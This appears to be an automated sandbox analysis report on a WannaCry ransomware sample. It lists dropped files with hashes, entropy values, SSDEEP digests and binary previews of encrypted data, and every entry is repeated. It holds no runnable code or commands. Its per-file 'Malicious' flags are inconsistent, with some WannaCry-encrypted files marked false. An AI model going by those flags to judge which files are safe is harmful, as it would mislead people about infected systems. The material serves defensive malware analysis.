                                                                                      Preview:WANACRY!...........N...`<..B..9.as..R...j.@((.X..*._f!6w.N.XFT....w...@\c....m....Hq~.gdqa}. .9..........V.A.4..+.N.;.F..."..%E..#.5.yo.&......].....d....%*....s./=F.}....T..S........y..l.........{(.i....-..z..R..rz.~.[.h...{.X..X.d...6.x..]..%...>.^..................8."@...&..c2...3J.....u.-.....".S..X.BX1Z;\[<..U.z.^..6.....#.K&.....|.....:.h....][.Y9!_{.sVM=...........].&.].`.E/;.....=.W..=.........G........@o1.yT.x+w...uU..g..`'...#..Ht1q..X.3.o(.RwV..#....".7b.....7.0n18.#.d.c3.<.ye......N..x.2O.....*.kp9OY_t.sMNc%,i.F.Y..D.....N.......j*3.../c3.0.f.#.I.{..k.f.p.\...,..k.n....J........W..`!...O.&/..li...6F.<..+.%.......J...._.:u.<..).p7I......W."U'?.ar.x...E`.lm...o.p#..W..i.S........2...{."I..`E._..u.6.M..l....p..s....?a%T.E..;`..{(R;..iv..u..D...aJ...U.|..[.d.P.....YJ..}...\..........6.F Z^.1+.@K$....N..)...S.BI.V....!..a..7p......e.qo...{C......A..."bH..\.....~.u.........m..jfl.}.O&9Nb...*.|H+W.<...X...3.MI.eD.....4{...u.\a
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4856
                                                                                      Entropy (8bit):7.963046409804243
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oJRGChJ66v5LxBTd3Sd5I6LS8UHWiMe/LqUK/5+7q2qVn6ybeMPZ+pqkNmm:3CuULY7LSVHfN/LqUKoulV6ydSPV
                                                                                      MD5:D246CEFA0C737B8BA9C2DB8C0210E0B2
                                                                                      SHA1:21D06A67445B915A4938AA122A6B93D1CEE142A4
                                                                                      SHA-256:AA26D43AB059BF1ABC2C81879DC48083E1113B9A34FB355029350584DFA93C71
                                                                                      SHA-512:F7000F1F3FCD6969DADDE90B88662B8C34B9909AF1BF4B93E5C95F7983379530BFCC34CA9A0B431CAE2802702FF58CA3AA34691AF64474A3FD0B97CB699ECA50
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...........N...`<..B..9.as..R...j.@((.X..*._f!6w.N.XFT....w...@\c....m....Hq~.gdqa}. .9..........V.A.4..+.N.;.F..."..%E..#.5.yo.&......].....d....%*....s./=F.}....T..S........y..l.........{(.i....-..z..R..rz.~.[.h...{.X..X.d...6.x..]..%...>.^..................8."@...&..c2...3J.....u.-.....".S..X.BX1Z;\[<..U.z.^..6.....#.K&.....|.....:.h....][.Y9!_{.sVM=...........].&.].`.E/;.....=.W..=.........G........@o1.yT.x+w...uU..g..`'...#..Ht1q..X.3.o(.RwV..#....".7b.....7.0n18.#.d.c3.<.ye......N..x.2O.....*.kp9OY_t.sMNc%,i.F.Y..D.....N.......j*3.../c3.0.f.#.I.{..k.f.p.\...,..k.n....J........W..`!...O.&/..li...6F.<..+.%.......J...._.:u.<..).p7I......W."U'?.ar.x...E`.lm...o.p#..W..i.S........2...{."I..`E._..u.6.M..l....p..s....?a%T.E..;`..{(R;..iv..u..D...aJ...U.|..[.d.P.....YJ..}...\..........6.F Z^.1+.@K$....N..)...S.BI.V....!..a..7p......e.qo...{C......A..."bH..\.....~.u.........m..jfl.}.O&9Nb...*.|H+W.<...X...3.MI.eD.....4{...u.\a
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1208
                                                                                      Entropy (8bit):7.810011149683989
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk5J9Lztn8GknQqAscrewgw/PU/vfI0feOh+F12gPTKMWITCsdC62+JdyR:bkHtnLscBgwE/vfIAeC+F1vPTKS1Y+XK
                                                                                      MD5:15D26C25C5B1954FC2EE50B804BAE08C
                                                                                      SHA1:81EC742837A476F973BF33DD3E7356F08C4B3B30
                                                                                      SHA-256:292B97F1E8D9371783C20D00D536F0E8EFD91E1F86A22D8A19DD2BE7FF1F7AA8
                                                                                      SHA-512:3FFA0896CCFED7BEB3D41B5CE902007DD768D2E9FD07CA73FD861EAD1FB85D3997715EAACEEED111083BAA94818BF8643EB561EB9890A0D4AF1529323DF84A04
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....[..<`..4..1..2i........k..%..Z..~._n....+.../nLT.....{9;._...0...uxdS..K..k.:f9.7....%>.QBP........U.d..T*.....$.....3(...X.....E.M............(=.#B..J..L?R...r..0mS......+..3'.r.E.X.$*......XxI.S.._>v....\...y....&...e..c:.Z.<...K..!<.S...............F...^.-.....{e.8.-.'.a...8Q....6..s..]E(.i.=G.'.I..T.....s."x.x$........./.Hd.@.d.8.Xtap)W..-...!.... }..Cym..... ....i..?z..........BRyP\*..].x|}"0...8.W.R.]..Y}.n7G.&...t|..-..l.&.L...^|.Gm..."..1...0....P..kk.*.........I......r.....B..5....b..Z...,....-{.z.o..W.b...K.9..e].D..i.Kp....$.:..J..%\!.....C:.l..kU...t+.q..K/nD..&..S...`M..4.."..(t..m.U.5../z....y..+L..._!.........Mf..T..>.U1~....N........%..3...R......T.H.....\Q.....0_vs...aWD....{...a.=.de...I..`WEbe...+.I._..s9....E.e............ed|2r.k.T.$n.p..>5...}*N...z.".}&dz.MZXm.3B`..8.Gp{RN..k^.....Z...!..Re.z.....b.>7.1K...O q8.........T X...1:......n.....x_w..T..S/.'...8.E..Xa.=.w..H........T...dt...C.....k0....n
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1208
                                                                                      Entropy (8bit):7.810011149683989
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk5J9Lztn8GknQqAscrewgw/PU/vfI0feOh+F12gPTKMWITCsdC62+JdyR:bkHtnLscBgwE/vfIAeC+F1vPTKS1Y+XK
                                                                                      MD5:15D26C25C5B1954FC2EE50B804BAE08C
                                                                                      SHA1:81EC742837A476F973BF33DD3E7356F08C4B3B30
                                                                                      SHA-256:292B97F1E8D9371783C20D00D536F0E8EFD91E1F86A22D8A19DD2BE7FF1F7AA8
                                                                                      SHA-512:3FFA0896CCFED7BEB3D41B5CE902007DD768D2E9FD07CA73FD861EAD1FB85D3997715EAACEEED111083BAA94818BF8643EB561EB9890A0D4AF1529323DF84A04
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....[..<`..4..1..2i........k..%..Z..~._n....+.../nLT.....{9;._...0...uxdS..K..k.:f9.7....%>.QBP........U.d..T*.....$.....3(...X.....E.M............(=.#B..J..L?R...r..0mS......+..3'.r.E.X.$*......XxI.S.._>v....\...y....&...e..c:.Z.<...K..!<.S...............F...^.-.....{e.8.-.'.a...8Q....6..s..]E(.i.=G.'.I..T.....s."x.x$........./.Hd.@.d.8.Xtap)W..-...!.... }..Cym..... ....i..?z..........BRyP\*..].x|}"0...8.W.R.]..Y}.n7G.&...t|..-..l.&.L...^|.Gm..."..1...0....P..kk.*.........I......r.....B..5....b..Z...,....-{.z.o..W.b...K.9..e].D..i.Kp....$.:..J..%\!.....C:.l..kU...t+.q..K/nD..&..S...`M..4.."..(t..m.U.5../z....y..+L..._!.........Mf..T..>.U1~....N........%..3...R......T.H.....\Q.....0_vs...aWD....{...a.=.de...I..`WEbe...+.I._..s9....E.e............ed|2r.k.T.$n.p..>5...}*N...z.".}&dz.MZXm.3B`..8.Gp{RN..k^.....Z...!..Re.z.....b.>7.1K...O q8.........T X...1:......n.....x_w..T..S/.'...8.E..Xa.=.w..H........T...dt...C.....k0....n
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1368
                                                                                      Entropy (8bit):7.844445316043483
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk5Jmp0eILC00uefBC49JLXXpuirGjd0i1R/icf0uW7Jwhqqs7PmXyqxx0jax8L6:bkXmp0O1uuC4TLXsfr1RqQ1W7JrqLd3j
                                                                                      MD5:3A42C9523B653219CFD74018AF67198E
                                                                                      SHA1:51E232FFC266B4EA7A9111E21BD8FCA20AF48C4F
                                                                                      SHA-256:C58E93F9185643FCF48496705B625125B312EB7BE7AE9416DB3EAEFB3B48DD56
                                                                                      SHA-512:EF824251E752F79BA1234E6A73D5826D735FDF4F285B149BEF5AE4C825915824A0ECF941D960C1610AA13503A607C1E3EEB7EDACB042322E988A4D9CA476BF0E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....2._..0.&..M...y.CV...n....U......e.......SGe..u...OU..-..A7...\..6.)....6X.|.q1.jL...,....g...../...`....n\...w)..^.d]....z$b.....@7.~]?.......z.....W.w.....9.t..p..z......@`.L..#......?..?.KpL.Fa...[6...Z;X....]j....Qr..T...9.f..]...s.....!...S.....@.........$d)...].......]#..:7..XL......E.&|Y.G.g.in.(>..s8.3...}.K..0..6C.j...nr..u..e.U.=s..X....;'7.~..y-...F...%o..m~.'X{,...B}..../8g....4....S{...A.K..#..90.8.X0.U......\.[...7.._(.......QM.*..h.[m..8...0[......7.;+.....*5....\_.=../....E.w...,K._.....*.T.9.`..[.J.6>.......V..g...|.r'x.......J%.v..T=.U..G.h.N.+.T.4...C..zSw.....a.iP4.q....8.Z.....VJ.C.;...C.3.......&o&`.4..H.4.S.MF.v.W.o!.....G..0""$.o.I..Q.....H..1.`O.?%>.%#j...&.F..:-.T&.>.>sz<n.MB.IwsV...D|.>^..N....}.1^-h4.<R.r.....F2&'.Zb.X.r.....N.}...3r..G./Yy..Sz@C......psG.)...)..Q..V...h...........V..G<.._..$L...2=M%...y.*.......o...K.d...92...|..*o...J...P....oJ....Oh.+..........'.....(../$....6).&yOF.K..7.]..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1368
                                                                                      Entropy (8bit):7.844445316043483
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk5Jmp0eILC00uefBC49JLXXpuirGjd0i1R/icf0uW7Jwhqqs7PmXyqxx0jax8L6:bkXmp0O1uuC4TLXsfr1RqQ1W7JrqLd3j
                                                                                      MD5:3A42C9523B653219CFD74018AF67198E
                                                                                      SHA1:51E232FFC266B4EA7A9111E21BD8FCA20AF48C4F
                                                                                      SHA-256:C58E93F9185643FCF48496705B625125B312EB7BE7AE9416DB3EAEFB3B48DD56
                                                                                      SHA-512:EF824251E752F79BA1234E6A73D5826D735FDF4F285B149BEF5AE4C825915824A0ECF941D960C1610AA13503A607C1E3EEB7EDACB042322E988A4D9CA476BF0E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....2._..0.&..M...y.CV...n....U......e.......SGe..u...OU..-..A7...\..6.)....6X.|.q1.jL...,....g...../...`....n\...w)..^.d]....z$b.....@7.~]?.......z.....W.w.....9.t..p..z......@`.L..#......?..?.KpL.Fa...[6...Z;X....]j....Qr..T...9.f..]...s.....!...S.....@.........$d)...].......]#..:7..XL......E.&|Y.G.g.in.(>..s8.3...}.K..0..6C.j...nr..u..e.U.=s..X....;'7.~..y-...F...%o..m~.'X{,...B}..../8g....4....S{...A.K..#..90.8.X0.U......\.[...7.._(.......QM.*..h.[m..8...0[......7.;+.....*5....\_.=../....E.w...,K._.....*.T.9.`..[.J.6>.......V..g...|.r'x.......J%.v..T=.U..G.h.N.+.T.4...C..zSw.....a.iP4.q....8.Z.....VJ.C.;...C.3.......&o&`.4..H.4.S.MF.v.W.o!.....G..0""$.o.I..Q.....H..1.`O.?%>.%#j...&.F..:-.T&.>.>sz<n.MB.IwsV...D|.>^..N....}.1^-h4.<R.r.....F2&'.Zb.X.r.....N.}...3r..G./Yy..Sz@C......psG.)...)..Q..V...h...........V..G<.._..$L...2=M%...y.*.......o...K.d...92...|..*o...J...P....oJ....Oh.+..........'.....(../$....6).&yOF.K..7.]..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1512
                                                                                      Entropy (8bit):7.880588065235114
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkh+RaWJqQewrTDzXv5LSDzX0dqs92vkq8NMNyaMRD1SfNX7eAl2vkhM5exXJMp8:bksR3kizXvcnxs9aFYdCIwM5exXipF7K
                                                                                      MD5:8D7F81A99E3DCCEFBE243C31C9D76F15
                                                                                      SHA1:CD2C80F30F2D4412E94B5953A8E305CAD5DBBD36
                                                                                      SHA-256:FA05B68ACC4617645C3D96C4ED608CE48A521F8BCD1BFF454B490990D13F9C61
                                                                                      SHA-512:BE2A62462F45C4C457D54ED8404E6E1EE5512F3BA94C68880AE42BC2C559C774A7649B165C95C6B16F946B0367264A4FDBDCE82F26DFF39C5627AC741EF1DC82
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........F...u..\...u..&X.....'o......O.......}B.b.d.:....XJ...'....u.\L.;&(.x^1...`8c..e...Y..tpx\..[u......x..j.."..X[.........V.....!f#.f/.........]...:...b..A..*;....xM....^.;!...A#u...6.T..W...!...@.Y?t.9.LC..CWf..v..MWb.U.o...6.KNZ.................J...CmE..T.t.P.q:..b.]B)..AO..;.>Ih..]..x.p.0.vj+.l..W...A/~.u....3S.^!+<\..gV....\..0.5,....?}....T...|.RZ.!eV......i~E_..\...K..T*.A.*<^.P.6......y.._u/....k.....4/.i.\)..#.G=..|....j.r..ja..O..,.'c..c ..^w.-..S...//...D2...G...>4..1.6t6..O...7..".Y;.....GX...7.......Q<.n*'.'>.........~e..kW..:3[.2.1.{....Zv...o.a?...?..{..@.K...v.!."O......4.mg...1.4..........kN.I.]...1dl.V6.....Pyr....\.Q..E.f......;.k.m....x.g.....6zus..I..._1l'..Z..G.{N#....b;}.G=...E...rK...S...<.<-/8{.|A.../...d./.Q..g..(-......fQ..;.x.....v.........4}..k..l......f. .A..0..U..P.....}.U0.._/.d.O.9..01...g.<...u..[.._2....?....m.T...U...k..E{.^?s..F...>.Z.57..U.)..c9.@L....sY.n#:r.....N.RX./(".1>.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1512
                                                                                      Entropy (8bit):7.880588065235114
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkh+RaWJqQewrTDzXv5LSDzX0dqs92vkq8NMNyaMRD1SfNX7eAl2vkhM5exXJMp8:bksR3kizXvcnxs9aFYdCIwM5exXipF7K
                                                                                      MD5:8D7F81A99E3DCCEFBE243C31C9D76F15
                                                                                      SHA1:CD2C80F30F2D4412E94B5953A8E305CAD5DBBD36
                                                                                      SHA-256:FA05B68ACC4617645C3D96C4ED608CE48A521F8BCD1BFF454B490990D13F9C61
                                                                                      SHA-512:BE2A62462F45C4C457D54ED8404E6E1EE5512F3BA94C68880AE42BC2C559C774A7649B165C95C6B16F946B0367264A4FDBDCE82F26DFF39C5627AC741EF1DC82
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........F...u..\...u..&X.....'o......O.......}B.b.d.:....XJ...'....u.\L.;&(.x^1...`8c..e...Y..tpx\..[u......x..j.."..X[.........V.....!f#.f/.........]...:...b..A..*;....xM....^.;!...A#u...6.T..W...!...@.Y?t.9.LC..CWf..v..MWb.U.o...6.KNZ.................J...CmE..T.t.P.q:..b.]B)..AO..;.>Ih..]..x.p.0.vj+.l..W...A/~.u....3S.^!+<\..gV....\..0.5,....?}....T...|.RZ.!eV......i~E_..\...K..T*.A.*<^.P.6......y.._u/....k.....4/.i.\)..#.G=..|....j.r..ja..O..,.'c..c ..^w.-..S...//...D2...G...>4..1.6t6..O...7..".Y;.....GX...7.......Q<.n*'.'>.........~e..kW..:3[.2.1.{....Zv...o.a?...?..{..@.K...v.!."O......4.mg...1.4..........kN.I.]...1dl.V6.....Pyr....\.Q..E.f......;.k.m....x.g.....6zus..I..._1l'..Z..G.{N#....b;}.G=...E...rK...S...<.<-/8{.|A.../...d./.Q..g..(-......fQ..;.x.....v.........4}..k..l......f. .A..0..U..P.....}.U0.._/.d.O.9..01...g.<...u..[.._2....?....m.T...U...k..E{.^?s..F...>.Z.57..U.)..c9.@L....sY.n#:r.....N.RX./(".1>.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1752
                                                                                      Entropy (8bit):7.8794888665363105
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkiWJ3OHUiaOXQ6Y0gWJgfqAOgt2+ftNgP+:oiQncY0uCAC+ftNgP+
                                                                                      MD5:C4A8D114307EDA28480D68CB57260A0F
                                                                                      SHA1:29E0ABBAB75FA7C762671B300B6DEC49108A13A2
                                                                                      SHA-256:D03267274B2EB11D340F88BE0290254FC31A5C94EA4AEBBD1D029CE74AA552E0
                                                                                      SHA-512:7B3420B3DA131EDF1CD4E6009F56CF0319A4B2003B5D4FB71C258200BEC48AE52D4C5204045666A270379CF4A604B363158B82410E89FAB9E6FE25DD18313E3E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........(.H4?&.Vx..pE....O...Mu..2.At..=.....Y.r.<..%....5W.G..^.Y.....+..Y.E.Ir...V.............Oc...$.4_...l......#..S.t...]y...s.cB.ip.@}.\.,./3>..k...s.......#.@D...6.T(_...9..%.a...n;.....B..~....0%.Z.....(...eB...v.u...".....B..v\..G.B.gF.............IK7.i.a.t'-r....r<.[7E...S.....v.W.2../..{...L|.k.].I.{...vFL+c..t...l...B.C......z..X.'..Xt.g:X.....^4..tD..fW.".F..b.r....1qaV(...5I..6.h.S.5....BvH..K.H.*. *..i...R$^. q..D.....=...9.y....J.a.w.b..8?."W....M....d.;.....d.v...,\.?..P.^,..UW.. .w.j.m.P....+d.q..E.8V..-........T%Ve....f..b%]E.}.O..:D..s.D.....,.I8.L3.(3f..5d#.Y.]s...sg.s...F=.Q.N..."....un......Q....z.A......t........B.M..D...].V_G..4w..A.R..\h. ..0...W..s...a.&...E.6.7..y.....~[].2 ..i....b.1...$........O7.....l.}....V".....{.r..0.\.....Y>.......g.O.C...jl.-...<[..{-..'..$.B.(...t.....@.r.0......0.s.'_..+....//.#.ebF...1.z..`]ds..C.8.......&..^;.$}O%#^..v.....F.m..j.`.u.: ..B*............N..j.:...............
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1752
                                                                                      Entropy (8bit):7.8794888665363105
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkiWJ3OHUiaOXQ6Y0gWJgfqAOgt2+ftNgP+:oiQncY0uCAC+ftNgP+
                                                                                      MD5:C4A8D114307EDA28480D68CB57260A0F
                                                                                      SHA1:29E0ABBAB75FA7C762671B300B6DEC49108A13A2
                                                                                      SHA-256:D03267274B2EB11D340F88BE0290254FC31A5C94EA4AEBBD1D029CE74AA552E0
                                                                                      SHA-512:7B3420B3DA131EDF1CD4E6009F56CF0319A4B2003B5D4FB71C258200BEC48AE52D4C5204045666A270379CF4A604B363158B82410E89FAB9E6FE25DD18313E3E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........(.H4?&.Vx..pE....O...Mu..2.At..=.....Y.r.<..%....5W.G..^.Y.....+..Y.E.Ir...V.............Oc...$.4_...l......#..S.t...]y...s.cB.ip.@}.\.,./3>..k...s.......#.@D...6.T(_...9..%.a...n;.....B..~....0%.Z.....(...eB...v.u...".....B..v\..G.B.gF.............IK7.i.a.t'-r....r<.[7E...S.....v.W.2../..{...L|.k.].I.{...vFL+c..t...l...B.C......z..X.'..Xt.g:X.....^4..tD..fW.".F..b.r....1qaV(...5I..6.h.S.5....BvH..K.H.*. *..i...R$^. q..D.....=...9.y....J.a.w.b..8?."W....M....d.;.....d.v...,\.?..P.^,..UW.. .w.j.m.P....+d.q..E.8V..-........T%Ve....f..b%]E.}.O..:D..s.D.....,.I8.L3.(3f..5d#.Y.]s...sg.s...F=.Q.N..."....un......Q....z.A......t........B.M..D...].V_G..4w..A.R..\h. ..0...W..s...a.&...E.6.7..y.....~[].2 ..i....b.1...$........O7.....l.}....V".....{.r..0.\.....Y>.......g.O.C...jl.-...<[..{-..'..$.B.(...t.....@.r.0......0.s.'_..+....//.#.ebF...1.z..`]ds..C.8.......&..^;.$}O%#^..v.....F.m..j.`.u.: ..B*............N..j.:...............
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):28952
                                                                                      Entropy (8bit):7.993004075940766
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:V38l3IV9UqZ8tP/T2dY0351KrlbWaTdWH5hS0H0:V30e9U+MnT2O03OxiaTEH5RH0
                                                                                      MD5:F702326EC3A8213107C06F46FFA44788
                                                                                      SHA1:C645B4FB8E8B98DCDE9E5002516C24BB5CB91D08
                                                                                      SHA-256:B5958F327D1289451B40E38C0755FCCC168DD5DBE34365E29BC8EA5371814B4E
                                                                                      SHA-512:60B9D2FB7CE2DCE95B4531C49ED9FF4B42B2CF348B13D50544070ED3112918F83D33113A64BE3080D1353A2F8C46E07F0ABA91F49DBA0FC766C5B8371DF30808
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....&.....9G>.N..gu..8S'....M....W.......M........[.T.stf,p'...O....zQ.e....}.........}5.W.y2:..0...fA.G.......n+L&...;.y2.f.../.^U.#.N..U..xV....d ;....*i.....F.5.....h......8....H...5...x..\O....P.5.&.^._...D.L.J.......xx.Zulqp,..../..|INx........p......U..b.]{wG.p1........(.....u.........F...r.s5...J!..\.X.@/.l....FY.....<0+.,]^&.&...o.....*..F..[]..9..8.P.e.X`..,'I.t...{R...`.e.H.EQ....k.;.....a..j.D.R.5..EU...B5...\.....CT.M..B#D#@.c".!.6i...h-.Fc.L.......r.B;..D..Wem..a..#..].*?>..'!.9M;ggq...|...B....T.....X....j.....I.0^.4..-..WP..@E.=;.c..O.\1%zbW.'.....$.HJ)Z...dh....?.....Wg>..!n.0.&....L@.'..A.n`...%..N.cUM...!.#....{......R....[C......n;.......b+......S..v...x..t...i.U.Cuy.U.0.c.b.@.v?..........w2....0..x.$..In....yR.G./Y.y.U........qv.....m.....t.vs....*x.k1y......Q....Q9.....>.+....@...U...R....|...Qg..P.B..g...Z0.H.p.$.....-N...v,..F8......T.....x._..5..d#.Ehdh.H:.s..6,..7..=(..l.....KT.L...D..9.h.Ux
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):28952
                                                                                      Entropy (8bit):7.993004075940766
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:V38l3IV9UqZ8tP/T2dY0351KrlbWaTdWH5hS0H0:V30e9U+MnT2O03OxiaTEH5RH0
                                                                                      MD5:F702326EC3A8213107C06F46FFA44788
                                                                                      SHA1:C645B4FB8E8B98DCDE9E5002516C24BB5CB91D08
                                                                                      SHA-256:B5958F327D1289451B40E38C0755FCCC168DD5DBE34365E29BC8EA5371814B4E
                                                                                      SHA-512:60B9D2FB7CE2DCE95B4531C49ED9FF4B42B2CF348B13D50544070ED3112918F83D33113A64BE3080D1353A2F8C46E07F0ABA91F49DBA0FC766C5B8371DF30808
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....&.....9G>.N..gu..8S'....M....W.......M........[.T.stf,p'...O....zQ.e....}.........}5.W.y2:..0...fA.G.......n+L&...;.y2.f.../.^U.#.N..U..xV....d ;....*i.....F.5.....h......8....H...5...x..\O....P.5.&.^._...D.L.J.......xx.Zulqp,..../..|INx........p......U..b.]{wG.p1........(.....u.........F...r.s5...J!..\.X.@/.l....FY.....<0+.,]^&.&...o.....*..F..[]..9..8.P.e.X`..,'I.t...{R...`.e.H.EQ....k.;.....a..j.D.R.5..EU...B5...\.....CT.M..B#D#@.c".!.6i...h-.Fc.L.......r.B;..D..Wem..a..#..].*?>..'!.9M;ggq...|...B....T.....X....j.....I.0^.4..-..WP..@E.=;.c..O.\1%zbW.'.....$.HJ)Z...dh....?.....Wg>..!n.0.&....L@.'..A.n`...%..N.cUM...!.#....{......R....[C......n;.......b+......S..v...x..t...i.U.Cuy.U.0.c.b.@.v?..........w2....0..x.$..In....yR.G./Y.y.U........qv.....m.....t.vs....*x.k1y......Q....Q9.....>.+....@...U...R....|...Qg..P.B..g...Z0.H.p.$.....-N...v,..F8......T.....x._..5..d#.Ehdh.H:.s..6,..7..=(..l.....KT.L...D..9.h.Ux
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16664
                                                                                      Entropy (8bit):7.990933016887402
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:6oPkvyLvxfg4oeCiYybil4QDXtXtOWeXiYctZqAWKeekiH16Z:h86dfFCLybjg9XNABctZqAWKKiHA
                                                                                      MD5:5AEB7173A44388313D174521CC561D7D
                                                                                      SHA1:3255BA5CD329A74855877B23658237E0D4DB60BB
                                                                                      SHA-256:E7A02CA1EE7A158B040692B5854A90159A01756F4FF0C959AB618F5DBBA6CB44
                                                                                      SHA-512:CE051C7752646C8808F24D8560BBA21DA8DAAE41E880764764F4182D31DB25BA0F5F06CA0F66AFB8B4FF7CABC9C70D2A6F4D9561BAAA7705EC7404A5D49B0C79
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....L...R....X$...h....".B...0....T[.!.....O.1.|..5R..x.J.K...?r{....\.....[.~u;f.........v.=..j8.F.......|.....G...$.A...@.....l_OG..t.e.:jq..^.g.d...ENk-3zO.....7..8.1....fMWv...`-.\...K..S...c.oO..].Q.........$.....|(...D.E9`P$.g..6.../.cw.qb.......@........7}.....Q.Y..ulFJ..3u<M!.j.y=...^...0)..T.}Wr=._...|....:.]^8)~.. .gA......W....s....]...Q4K..L....a...M.....|<.^..X.)C.pu~r..+i....Ix#t.v.m..5......#..T.t....P....#..[........Y...~..p..5Ja.Uz...nzx.rs...K!l..w0..~..j1...Sf......c..}.V.H...-.......U.T.D..=c..9...k..,<1.......)....VG.)j...1...v4..I.@.".%V.1.~R..:B......Kn.5..nC.0..... .....X]d.wVEn.,.RVA...P....y..67F..}..T..b. .;..?.l...<...o......+.......;............O..]......%...]>......\d.V,....8X.+....F..".J......*;......I.<n.m...s.5.....85....C..i..k....M.*.*{..5..x......7C..{.ol..v.5Z....\v.K...j...."U.]...4m.V.M......./h.2.J.Z.c.(..X....R..(.p......p..........W...X'i...Y....."$.2....{z.d..a...m.c.i".+.....{P.Y'.-..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16664
                                                                                      Entropy (8bit):7.990933016887402
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:6oPkvyLvxfg4oeCiYybil4QDXtXtOWeXiYctZqAWKeekiH16Z:h86dfFCLybjg9XNABctZqAWKKiHA
                                                                                      MD5:5AEB7173A44388313D174521CC561D7D
                                                                                      SHA1:3255BA5CD329A74855877B23658237E0D4DB60BB
                                                                                      SHA-256:E7A02CA1EE7A158B040692B5854A90159A01756F4FF0C959AB618F5DBBA6CB44
                                                                                      SHA-512:CE051C7752646C8808F24D8560BBA21DA8DAAE41E880764764F4182D31DB25BA0F5F06CA0F66AFB8B4FF7CABC9C70D2A6F4D9561BAAA7705EC7404A5D49B0C79
                                                                                      Malicious:true
                                                                                      Reputation:low
